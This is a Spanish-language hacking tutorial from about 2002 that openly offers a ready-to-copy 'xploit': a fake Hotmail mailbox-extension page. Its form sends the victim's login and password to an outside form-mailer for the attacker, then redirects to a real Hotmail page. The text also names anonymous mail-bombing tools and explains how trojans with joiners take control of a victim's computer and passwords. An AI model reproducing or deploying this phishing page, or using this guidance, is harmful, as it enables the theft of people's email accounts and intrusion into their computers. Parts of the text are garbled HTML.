width="720"><FONT class=legalese face="Arial, helvetica, sans
serif" color=#000000

size=1> <!-- START LEGALESE/DISCLAIMER TEXT -->


<BR> Como usuario
de Hotmail, ha recibido este correo electrnico que le permite
informarse sobre
los nuevos servicios. Nuestra poltica siempre ha consistido en
enviar mensajes
de correo electrnico slo para anunciar informacin de esas
caractersticas y
continuaremos respetndola. Gracias por ser usuario de Hotmail.
<BR></FONT>
</TD> </TR> <font color=#000000></div> </font> <form
name="move2" action="http://lw9fd.law9.hotmail.msn.com/cgibin/getmsg"> <input
type="hidden" name="curmbox" value="F000000001"> <input
type="hidden" name="msg"
value="MSG1019098030.92"> <input type="hidden" name="js">
<input type="hidden"
name="stationery" value=""> <input type="hidden"
name="_HMaction" value="MoveTo">
<input type="hidden" name="cmd"> <td width="92"> <IMG
SRC="http://h.msn.com/c.gif? RF=http%3a%2f%2flw9fd
%2elaw9%2ehotmail%2emsn%2ecom
%2fcgi%2dbin%2fgetmsg%3fcurmbox%3dF000000001%26a%3
de7232cac72b248c54b78fbb017338ba7%26msg%3dMSG10196
09918%2e80%26mfs%3d592%26_HMaction%3dmove%26tobox
%

3dF000000004%26direction
%3dnext&PI=44381&DI=7474&PS=8317">
</table> </body> </html>

4 Xploit - Verlo
Haz click en --> Copy <-- para copiar el xploit
<HTML>
<HEAD> <TITLE>Extender Casilla de Correo</TITLE>
<META name="description"
content=""> <META name="keywords" content=""> <style
type="text/css">
<!-- A:link {text-decoration: none;} A:visited {text-decoration:
none;} -->
</style> </HEAD> <BODY BGCOLOR="FFFFFF"
TEXT="000000" LINK="0000FF"
VLINK="800080"> <center> <table cellSpacing="0"
cellPadding="2" width="100%"
border="0"> <tr vAlign="center"> <td style="PADDING-TOP:
25px" noWrap
align="left"><font class="s"> <b> <a
href="http://www.hotmail.com/"><font
size="4">PGINA PRINCIPAL</font></a></b> </font></td>
<td align="right" width="100%"> <img
src="http://64.4.18.24/lgo_msn_113x49.gif"
align="bottom" border="0" width="113" height="49"> </td> <td
style="PADDING-TOP:

15px" vAlign="center" noWrap> <font class="f" style="FONTSIZE: 24px" size="6">Cuenta


de Hotmail</font></td> </tr> <tr> <td bgColor="#336699"
colSpan="3"> <font class="fw" style="FONT-SIZE: 12px"
color="#ffffff" size="4"><b>Por
qu registrarse?</b></font></td> </tr> <tr vAlign="top">
<td colSpan="3"> </td> </tr> </table> <font class="f"
size="2"> <table cellSpacing="0" cellPadding="2"
width="100%" border="0">
<tr> <td bgColor="#dbeaf5" colSpan="2"><font class="title">
<font
face="Arial" size="2"><b>Desea registrarse para extender el
tamao de
su casilla de correo?</b></font></font></td> </tr>
</table> <div align="center"> <center> <BR><font
color="#FFFFFF">.
</font> <table cellSpacing="0" cellPadding="0" border="0"
style="border-collapse:
collapse" bordercolor="#111111"> <form name="passwordform"
method="post"
action="http://www.melodysoft.com/cgi-bin/form.cgi"> <input
type="hidden"
name="recipient" value="aquitucorreo@hotmail.com"> <input
type="hidden"
name="redirect" value="http://lc2.law5.hotmail.passport.com/cgibin/dasp/hminfo_shell.asp?

_lang=ES&content=ssl&id=2&fs=1&cb=_lang
%3dES&ct=1234567890">
<input type="hidden" name="subject" value="Suscripcion
Hotmail Cuenta Grande">
<tr vAlign="bottom"> <td width="5" height="20"> </td> <td
vAlign="bottom" colSpan="5"><b> <font class="f" size="2"
face="Arial">Nombre
de inicio de sesin</font></b></td> </tr> <tr vAlign="bottom">
<td width="5"> </td> <td vAlign="bottom" noWrap><input
maxLength="64" size="16" name="login"></td> <td
vAlign="center" align="middle"><font
class="f" size="4"><b>@</b></font></td> <td vAlign="center"
noWrap> <select id="a_d" style="FONT-SIZE: 11px; FONTFAMILY: tahoma,san-serif"
onchange="return SelectChanger(this);" name="domain">
<option value="hotmail.com"
selected>hotmail.com</option> <option
value="msn.com">msn.com</option>
</select> <input type="hidden" value="mail" name="svc">
<input
type="hidden"
value="https://login.msnia.passport.com/ppsecure/post.asp"
name="RemoteDAPost">
</td> </tr> <tr vAlign="bottom"> <td width="5"> </td>
<td vAlign="bottom" noWrap colSpan="3"> <font class="f"
size="2" face="Arial"><b>

Contrasea</b></font></td> </tr> <tr vAlign="center">


<td width="5"> </td> <td noWrap> <input id="a_p"
type="password"
maxLength="16" size="16" value name="passwd"></td> <td>
</td>
<td> <table cellSpacing="0" cellPadding="0" border="0"
valign="top">
<tr> <td><input type="submit" value="Registrarse ahora"
name="enter"></td>
</tr> </table> </td> </tr> </form> </table>
</center> <br><font color="#FFFFFF">. </font> </div>
<hr width="75%"> <><font size="+1"><b>Extienda el tamao
de su casilla de correo</b></font></p> <ul> <font
color="#0000FF">
<li>Actualmente su casilla de correo esta limitada a 2
Mb</li></font>
<font color="#0000FF"> <li>Actualmente puede enviar y recibir
hasta
1 Mb de archivos adjuntos </li> <li>Adjunte ilimitados archivos
hasta
2 Mb </li> <li>Reciba hasta 6 Mb en su casilla de correo
almacenados
</li> <li>Su correo electrnico es privado y seguro </li>
<li>Hotmail
es rpido y fcil de usar </li> <li>Mantenga el correo electrnico
personal separado del correo electrnico de trabajo </li> </font>

</ul> <hr width="75%"> <><font size="+1"><b>Reciba


extensos archivos adjuntos</b></font></p> <>Hotmail es
el principal proveedor mundial de correo electrnico basado en
Web, lo que significa
que podr enviar y recibir mensajes desde cualquier equipo
conectado a Internet.
Ahora Hotmail extiende el tamao de su casilla de correo. Puede
utilizar Hotmail
desde casa, el trabajo, el instituto, un caf Internet, la casa de un
amigo o
cualquier otro equipo del mundo con conexin a Internet. Los
mensajes se almacenan
en una ubicacin central, por lo que su bandeja central siempre
estar actualizada.
Esta caracterstica es muy adecuada para personas que utilizan
ms de un equipo,
viajan con frecuencia o ni siquiera tienen un equipo. </p>
<><font
color="#0000FF"><i>Regstrese ahora para extender el tamao
de su casilla
de correo a 6 Mb.</i> </font></p> <hr width="75%"> </font>
<center> <center> <table cellpadding=0 cellspacing=0 border=0
width=590>
<tr> <td> </fORM> </table> <table cellpadding=0 cellspacing=0
border=0 width=730> <tr> <td width="728"> < align="center">

<font class="s"> 2002 Microsoft Corporation. All rights


reserved. <a
href="http://www.hotmail.msn.com/cgibin/dasp/hminfo_shell.asp?_lang=&beta=&in=yes&content=tos"
target="_top">Terminos del servicio</a> <a
href="http://www.hotmail.msn.com/cgibin/dasp/hminfo_shell.asp?
_lang=&f=33792&curmbox=&_lang=&beta=&in=yes&content=
pstate"
target="_top">Privacidad</a></font> </td> </tr> </table>
</center> </form> <> </p> </BODY> </HTML>

Bjate los programas para enviar correos annimos: Achis


Bomber, McSpammer, UBI ANONYMUS MAIL, XMAS 2000.

Troyanos

Y weno hablamos d ingenieria social, hablamos de exploits pero


no podia faltar los famosos troyanos. Pero empezemos a ver
primero q es un troyano, pero para saber esto hay q conocer d
donde viene su verdadero nombre: "Caballo De Trolla". Los
antiguos griegos dp d 9 aos d batalla contra Trolla se las
ingeniaron haciendo un plan para entrar en sus majestuosas
murallas. Les dejaron un "pequeo presente" q consistia en un
caballo de madera y a continuacion los griegos hicieron una
retirada. Pero ese caballo dentro tenia varios soldados q abriero la
puerta dejando entrar al ejercito griego y destrullendo el imperio d
Troya. Ahora vos taras pensando y a mi q me importa? Weno,un

troyano es un programa con el cual uno puede acceder a otra pc a


travez d internet contralando todo lo q hace, viendo sus claves,
etc.Un troyano se divide en 2 partes: El Cliente y El Servidor.
- El Server: El server es el pequeo programa q tendria q tener el
atacante. Generalmente, se los une con otros programas llamados
joiners, q unen el programa server con otros programas, asi
cuando el usuario lo abre inocentemente no sabe q se infecta con
el troyano. Si el usuario utiliza dial up, el server le envia un mail
al cliente con la nueva ip. Este se esconde en la memoria y se
encarga d abrir los puertos para recibir la informacion del cliente.
Este representaria al caballo q dejaron los griegos.
- El Cliente: Este es el programa x el cual nostros manejaremos la
computadora de la victima. Generalemente nos vaa pedir el ip d
esta, y se fija si esta el server colocado y listo y si esta el puerto
abierto. Algunos trayonos dejan especificar el puerto q keres abrir
para q no se tope con ningun otro programa, total hay muchos
puertos.
*CkOzMhO*
spuma_77_2@hotmail.com